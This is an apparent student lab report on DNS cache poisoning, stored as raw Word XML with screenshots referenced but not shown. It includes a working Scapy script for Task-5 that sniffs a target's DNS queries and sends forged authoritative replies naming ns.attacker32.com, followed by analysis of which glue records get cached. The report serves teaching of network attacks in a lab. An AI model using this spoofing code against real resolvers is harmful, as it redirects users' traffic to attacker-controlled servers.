    <w:p w14:paraId="3A709CB3" w14:textId="431F0813" w:rsidR="008D79FD" w:rsidRDefault="008D79FD" w:rsidP="003B0241">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1885AC5A" w14:textId="69292D1C" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="003B0241">
      <w:r>
        <w:t>First, we clear the DNS cache from the local DNS server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6082CB73" w14:textId="77777777" w:rsidR="00905929" w:rsidRDefault="00905929" w:rsidP="003B0241">
      <w:r w:rsidRPr="00905929">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7500259F" wp14:editId="21B04D6F">
            <wp:extent cx="2863997" cy="444523"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31" name="Picture 3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7618" w14:textId="2489F716" w:rsidR="000D06E7" w:rsidRDefault="00905929" w:rsidP="003B0241">
      <w:r>
        <w:t xml:space="preserve">After this, we run the attack on the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00F67BF2">
        <w:t>machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6615F6FC" w14:textId="220ACC59" w:rsidR="00905929" w:rsidRDefault="001C0782" w:rsidP="003B0241">
      <w:r w:rsidRPr="001C0782">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C0F02C5" wp14:editId="46EA3547">
            <wp:extent cx="2343270" cy="501676"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32" name="Picture 32" descr="A picture containing text, orange,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ext, orange, dark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43270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26DC" w14:textId="2EC669AF" w:rsidR="001C0782" w:rsidRDefault="001C0782" w:rsidP="003B0241">
      <w:r>
        <w:t>Now, digging ‘www.example.com’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD12995" w14:textId="2D645F8B" w:rsidR="001C0782" w:rsidRDefault="009A3AD8" w:rsidP="003B0241">
      <w:r w:rsidRPr="009A3AD8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="016F774E" wp14:editId="1BEEA609">
            <wp:extent cx="6858000" cy="4366895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1AC7" w14:textId="39916731" w:rsidR="009A3AD8" w:rsidRDefault="009A3AD8" w:rsidP="003B0241">
      <w:r>
        <w:t>Now, checking the entries in the DNS cache on local DNS server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A308EA1" w14:textId="160F0986" w:rsidR="009A3AD8" w:rsidRDefault="00B42FF8" w:rsidP="003B0241">
      <w:r w:rsidRPr="00B42FF8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28870265" wp14:editId="5E73A85E">
            <wp:extent cx="5969307" cy="990651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69307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1852" w14:textId="3F89C966" w:rsidR="00B42FF8" w:rsidRDefault="0020624D" w:rsidP="003B0241">
      <w:r w:rsidRPr="0020624D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B02D8F6" wp14:editId="074A1163">
            <wp:extent cx="6153466" cy="1047804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3466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BD93" w14:textId="01A4349A" w:rsidR="008C3083" w:rsidRDefault="008C3083" w:rsidP="008C3083">
      <w:r>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0E3F">
        <w:t xml:space="preserve"> cache operates on a "request and response" model</w:t>
      </w:r>
      <w:r w:rsidR="00674DA6">
        <w:t>, w</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0E3F">
        <w:t>hen a DNS query is made for a domain name, the response from the DNS server is cached in the local cache of the requesting device or in an intermediary caching server</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2868DD" w14:textId="77777777" w:rsidR="008C3083" w:rsidRDefault="008C3083" w:rsidP="003B0241"/>
    <w:p w14:paraId="24001E01" w14:textId="04B8AD6F" w:rsidR="0020624D" w:rsidRDefault="0020624D" w:rsidP="003B0241">
      <w:r>
        <w:t>‘google.com’ is no</w:t>
      </w:r>
      <w:r w:rsidR="005B1CC4">
        <w:t>t queried, i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">t has not been cached </w:t>
      </w:r>
      <w:r w:rsidR="00AC158A">
        <w:t xml:space="preserve">onto the local DNS server, due to which we cannot map the fake nameserver </w:t>
      </w:r>
      <w:r w:rsidR="00A3615C">
        <w:t>to it while we are digging the example domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE221FD" w14:textId="77777777" w:rsidR="005B1CC4" w:rsidRDefault="005B1CC4" w:rsidP="003B0241"/>
    <w:p w14:paraId="0E83A2A6" w14:textId="29B23992" w:rsidR="008018E7" w:rsidRDefault="00A3615C" w:rsidP="003B0241">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task-5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35577161" w14:textId="50062A9B" w:rsidR="00A3615C" w:rsidRDefault="00A3615C" w:rsidP="003B0241">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298E406C" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514A299A" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252AE5E5" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575"/>
    <w:p w14:paraId="79C239B6" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t>target = sys.argv[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2CEBD0" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575"/>
    <w:p w14:paraId="755F453A" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t>def spoof_dns(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EFCAE3" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">  if (DNS in pkt and 'www.example.com' in pkt[DNS].qd.qname.decode('utf-8')):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24475A62" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575"/>
    <w:p w14:paraId="60631500" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">    # Swap the source and destination IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54299211" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">    IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D573AF" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575"/>
    <w:p w14:paraId="6CC3F4C9" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">    # Swap the source and destination port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3492B8A8" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">    UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC2E5C3" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575"/>
    <w:p w14:paraId="7EF556C8" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">    # The Answer Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250F3B0E" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">    Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5459606D" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">                 ttl=259200, rdata='1.1.1.1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D5155C" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575"/>
    <w:p w14:paraId="20A12325" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">    # The Authority Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CE092C" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">    NSsec1 = DNSRR(rrname='example.com', type='NS',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B42C8CE" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">                   ttl=259200, rdata='ns.attacker32.com')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1E6F4A" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">    NSsec2 = DNSRR(rrname='example.com', type='NS',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A0254E" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">                   ttl=259200, rdata='ns.example.com')  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C3D662" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575"/>
    <w:p w14:paraId="3C045E85" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">     # The Additional Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAAE3E5" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">    Addsec1 = DNSRR(rrname='ns.attacker32.com', type='A',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF577EC" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    ttl=259200, rdata='1.2.3.4')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00066743" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">    Addsec2 = DNSRR(rrname='ns.example.net', type='A',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B4369B" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">                    ttl=259200, rdata='5.6.7.8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9F93CD" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">    Addsec3 = DNSRR(rrname='www.facebook.com', type='A',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F60F82" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">                    ttl=259200, rdata='3.4.5.6')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABDD58E" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB66E92" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BCA38B" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575"/>
    <w:p w14:paraId="43DAD06E" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">    # Construct the DNS packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7AE9FF" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">    DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526FB3E7" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">                 qdcount=1, ancount=1, nscount=2, arcount=3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22557DB6" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">                 an=Anssec, ns=NSsec1/NSsec2, ar=Addsec1/Addsec2/Addsec3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C46BF6" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575"/>
    <w:p w14:paraId="3E6E82BA" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">    # Construct the entire IP packet and send it out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3099E28D" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">    spoofpkt = IPpkt/UDPpkt/DNSpkt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9511EB" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">    send(spoofpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DD1DEA" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575"/>
    <w:p w14:paraId="34D18708" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t># Sniff UDP query packets and invoke spoof_dns().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6535FC65" w14:textId="77777777" w:rsidR="00E51575" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t>f = 'udp and (src host {} and dst port 53)'.format(target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179D60B7" w14:textId="74F13ABE" w:rsidR="00A3615C" w:rsidRDefault="00E51575" w:rsidP="00E51575">
      <w:r>
        <w:t xml:space="preserve">pkt = sniff(iface='br-ed9341677666', filter=f, prn=spoof_dns)      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65679052" w14:textId="77777777" w:rsidR="00E51575" w:rsidRPr="00A3615C" w:rsidRDefault="00E51575" w:rsidP="00E51575"/>
    <w:p w14:paraId="362F1E57" w14:textId="487BCA21" w:rsidR="00A3615C" w:rsidRPr="00A3615C" w:rsidRDefault="00A3615C" w:rsidP="003B0241">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA7BEE6" w14:textId="2B981B18" w:rsidR="00A33A14" w:rsidRDefault="00AC3B19" w:rsidP="003B0241">
      <w:r>
        <w:t>First flush the DNS cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05542A8F" w14:textId="462C65E5" w:rsidR="00AC3B19" w:rsidRDefault="002408B5" w:rsidP="003B0241">
      <w:r w:rsidRPr="002408B5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="797C06C8" wp14:editId="261D1E9E">
            <wp:extent cx="2959252" cy="387370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="Picture 3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59252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DB82" w14:textId="00D9DC79" w:rsidR="002408B5" w:rsidRDefault="002408B5" w:rsidP="003B0241">
      <w:r>
        <w:t>Now, run the attack on the attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EBB5F8" w14:textId="41907826" w:rsidR="002408B5" w:rsidRDefault="00476454" w:rsidP="003B0241">
      <w:r w:rsidRPr="00476454">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27C4D184" wp14:editId="44A67983">
            <wp:extent cx="2330570" cy="425472"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38" name="Picture 38" descr="A picture containing text, oran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text, orang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1050" w14:textId="58E6B176" w:rsidR="00476454" w:rsidRDefault="00476454" w:rsidP="003B0241">
      <w:r>
        <w:t>Now, dig ‘www.example.com’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7C416D" w14:textId="7F9D1609" w:rsidR="00476454" w:rsidRDefault="00375DFB" w:rsidP="003B0241">
      <w:r w:rsidRPr="00375DFB">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62D11458" wp14:editId="17CF1D20">
            <wp:extent cx="6858000" cy="4866005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39" name="Picture 3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4710" w14:textId="35B8C194" w:rsidR="00375DFB" w:rsidRDefault="00375DFB" w:rsidP="003B0241">
      <w:r>
        <w:t xml:space="preserve">This makes the initial attack for </w:t>
      </w:r>
      <w:r w:rsidR="00B63BEF">
        <w:t>www.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">example.com </w:t>
      </w:r>
      <w:r w:rsidR="00B63BEF">
        <w:t>hostname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> successful,</w:t>
      </w:r>
      <w:r w:rsidR="00B63BEF">
        <w:t xml:space="preserve"> but let us verify the entries in the DNS cache</w:t>
      </w:r>
      <w:r w:rsidR="00DA3301">
        <w:t xml:space="preserve"> on the local DNS host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE720C9" w14:textId="69EADBAB" w:rsidR="00DA3301" w:rsidRDefault="00DA3301" w:rsidP="003B0241">
      <w:r w:rsidRPr="00DA3301">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03F613FB" wp14:editId="12693A36">
            <wp:extent cx="5810549" cy="1854295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10549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15D8" w14:textId="356A9941" w:rsidR="00DA3301" w:rsidRDefault="00EC653F" w:rsidP="003B0241">
      <w:r>
        <w:t>We can see that example.com domain has only one entry, as it has been overwritten in the sequence of execution of the mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55862DCD" w14:textId="28E36D60" w:rsidR="00EC653F" w:rsidRDefault="004039C4" w:rsidP="003B0241">
      <w:r>
        <w:t>First we tried to map it to ‘ns.attaker32.com’, the we tried to map it to  ‘ns.example.com’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E7B92B" w14:textId="3855024B" w:rsidR="004039C4" w:rsidRDefault="001E2D4C" w:rsidP="003B0241">
      <w:r>
        <w:t>This justifies the first nameserver entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3045C180" w14:textId="5F1F407C" w:rsidR="001E2D4C" w:rsidRDefault="001E2D4C" w:rsidP="003B0241">
      <w:r>
        <w:t>Now, let us verify the additional entries,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF9B182" w14:textId="40B4075A" w:rsidR="001E2D4C" w:rsidRDefault="00240952" w:rsidP="003B0241">
      <w:r w:rsidRPr="00240952">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C972FE9" wp14:editId="3F15C1AE">
            <wp:extent cx="5931205" cy="1149409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1205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EB0D" w14:textId="03570C30" w:rsidR="00240952" w:rsidRDefault="00240952" w:rsidP="003B0241">
      <w:r>
        <w:t xml:space="preserve">Above is the </w:t>
      </w:r>
      <w:r w:rsidR="00B70FAA">
        <w:t xml:space="preserve">output when we search for attacker on the </w:t>
      </w:r>
      <w:r w:rsidR="00CA606B">
        <w:t>DNS cache. The entry for ‘</w:t>
      </w:r>
      <w:r w:rsidR="00CA606B">
        <w:t>ns.attacker32.com.</w:t>
      </w:r>
      <w:r w:rsidR="00CA606B">
        <w:t>’ on the additional is not present</w:t>
      </w:r>
      <w:r w:rsidR="00E3791E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BBFE62" w14:textId="77777777" w:rsidR="00D72E30" w:rsidRDefault="00E3791E" w:rsidP="003B0241">
      <w:r>
        <w:t>Likewise, additional entries that we have passed for ‘</w:t>
      </w:r>
      <w:r>
        <w:t>ns.example.net.</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00D72E30">
        <w:t xml:space="preserve"> (as we have seen in the earlier screenshot)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D72E30">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00B575DD">
        <w:t>‘w</w:t>
      </w:r>
      <w:r w:rsidR="00B575DD">
        <w:t>ww.facebook.com.</w:t>
      </w:r>
      <w:r w:rsidR="00B575DD">
        <w:t xml:space="preserve">’ are not present in the DNS cache </w:t>
      </w:r>
      <w:r w:rsidR="00D72E30">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00B575DD">
        <w:t>see below</w:t>
      </w:r>
      <w:r w:rsidR="00D72E30">
        <w:t xml:space="preserve"> screenshot)</w:t>
      </w:r>
      <w:r w:rsidR="00B575DD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9449F2" w14:textId="481AEAF0" w:rsidR="00B575DD" w:rsidRDefault="00C9265D" w:rsidP="003B0241">
      <w:r w:rsidRPr="00C9265D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C924E94" wp14:editId="13DD9129">
            <wp:extent cx="4953255" cy="997001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46A3" w14:textId="34B90416" w:rsidR="003D5ED9" w:rsidRDefault="003D5ED9" w:rsidP="003B0241">
      <w:r>
        <w:t xml:space="preserve">Additional </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5ED9">
        <w:t>records that provide the IP address of a nameserver for a subdomain of the domain being queried</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EE45EA">
        <w:t>These records are called glue records, g</w:t>
      </w:r>
      <w:r w:rsidR="00EE45EA" w:rsidRPr="00EE45EA">
        <w:t>lue records are required when the authoritative nameserver for a domain is within the same domain itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DE9902" w14:textId="4CFEEB07" w:rsidR="00EE45EA" w:rsidRPr="00D550B1" w:rsidRDefault="00EE45EA" w:rsidP="003B0241">
      <w:r>
        <w:t xml:space="preserve">Since </w:t>
      </w:r>
      <w:r w:rsidR="00C30035">
        <w:t>neither ‘</w:t>
      </w:r>
      <w:r>
        <w:t>facebook.com</w:t>
      </w:r>
      <w:r w:rsidR="00C30035">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006124D6">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidR="00184864">
        <w:t>‘example.net’</w:t>
      </w:r>
      <w:r w:rsidR="006124D6">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidR="005F2516">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="005F2516">
        <w:t>ns.attacker32.com</w:t>
      </w:r>
      <w:r w:rsidR="005F2516">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00184864">
        <w:t xml:space="preserve"> fall under the subdomain of example.com, the entries are not cached.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00EE45EA" w:rsidRPr="00D550B1" w:rsidSect="00F107E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3B2610"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="879836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79659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F7B"/>
    <w:rsid w:val="00063620"/>
    <w:rsid w:val="0008590A"/>
    <w:rsid w:val="0009451E"/>
    <w:rsid w:val="000D06E7"/>
    <w:rsid w:val="000E45E5"/>
    <w:rsid w:val="00120541"/>
    <w:rsid w:val="00184864"/>
    <w:rsid w:val="001A5C85"/>
    <w:rsid w:val="001B1067"/>
    <w:rsid w:val="001C0782"/>
    <w:rsid w:val="001C64F8"/>
    <w:rsid w:val="001E2D4C"/>
    <w:rsid w:val="0020624D"/>
    <w:rsid w:val="00225F50"/>
    <w:rsid w:val="002408B5"/>
    <w:rsid w:val="00240952"/>
    <w:rsid w:val="00250F86"/>
    <w:rsid w:val="002D4878"/>
    <w:rsid w:val="003005D7"/>
    <w:rsid w:val="00311E96"/>
    <w:rsid w:val="00360463"/>
    <w:rsid w:val="0036502B"/>
    <w:rsid w:val="00375DFB"/>
    <w:rsid w:val="003B0241"/>
    <w:rsid w:val="003D5ED9"/>
    <w:rsid w:val="003E5A5F"/>
    <w:rsid w:val="004039C4"/>
    <w:rsid w:val="00476454"/>
    <w:rsid w:val="0048283D"/>
    <w:rsid w:val="0055256B"/>
    <w:rsid w:val="005B1CC4"/>
    <w:rsid w:val="005F2516"/>
    <w:rsid w:val="006040FC"/>
    <w:rsid w:val="00607EBD"/>
    <w:rsid w:val="006124D6"/>
    <w:rsid w:val="0062776F"/>
    <w:rsid w:val="00640BB2"/>
    <w:rsid w:val="0065259A"/>
    <w:rsid w:val="00674DA6"/>
    <w:rsid w:val="006A522C"/>
    <w:rsid w:val="006B02B7"/>
    <w:rsid w:val="006E1CBB"/>
    <w:rsid w:val="00732559"/>
    <w:rsid w:val="00753461"/>
    <w:rsid w:val="007C3924"/>
    <w:rsid w:val="007D5F5A"/>
    <w:rsid w:val="007E7A5D"/>
    <w:rsid w:val="008018E7"/>
    <w:rsid w:val="008C3083"/>
    <w:rsid w:val="008D79FD"/>
    <w:rsid w:val="00905929"/>
    <w:rsid w:val="00954525"/>
    <w:rsid w:val="009A0E3F"/>
    <w:rsid w:val="009A3AD8"/>
    <w:rsid w:val="009F2824"/>
    <w:rsid w:val="00A01DE0"/>
    <w:rsid w:val="00A33A14"/>
    <w:rsid w:val="00A3615C"/>
    <w:rsid w:val="00A65914"/>
    <w:rsid w:val="00A80622"/>
    <w:rsid w:val="00AB6705"/>
    <w:rsid w:val="00AC158A"/>
    <w:rsid w:val="00AC3B19"/>
    <w:rsid w:val="00B1489D"/>
    <w:rsid w:val="00B42FF8"/>
    <w:rsid w:val="00B47B44"/>
    <w:rsid w:val="00B575DD"/>
    <w:rsid w:val="00B63BEF"/>
    <w:rsid w:val="00B70FAA"/>
    <w:rsid w:val="00B84D8C"/>
    <w:rsid w:val="00BA5ED9"/>
    <w:rsid w:val="00BD08C8"/>
    <w:rsid w:val="00BE1C0B"/>
    <w:rsid w:val="00BE5F7B"/>
    <w:rsid w:val="00C30035"/>
    <w:rsid w:val="00C569E3"/>
    <w:rsid w:val="00C66463"/>
    <w:rsid w:val="00C9265D"/>
    <w:rsid w:val="00CA606B"/>
    <w:rsid w:val="00D550B1"/>
    <w:rsid w:val="00D67688"/>
    <w:rsid w:val="00D7012B"/>
    <w:rsid w:val="00D71113"/>
    <w:rsid w:val="00D72E30"/>
    <w:rsid w:val="00D971B9"/>
    <w:rsid w:val="00DA3301"/>
    <w:rsid w:val="00DD2FAF"/>
    <w:rsid w:val="00E3791E"/>
    <w:rsid w:val="00E51575"/>
    <w:rsid w:val="00E96DF3"/>
    <w:rsid w:val="00EB116C"/>
    <w:rsid w:val="00EC53A8"/>
    <w:rsid w:val="00EC653F"/>
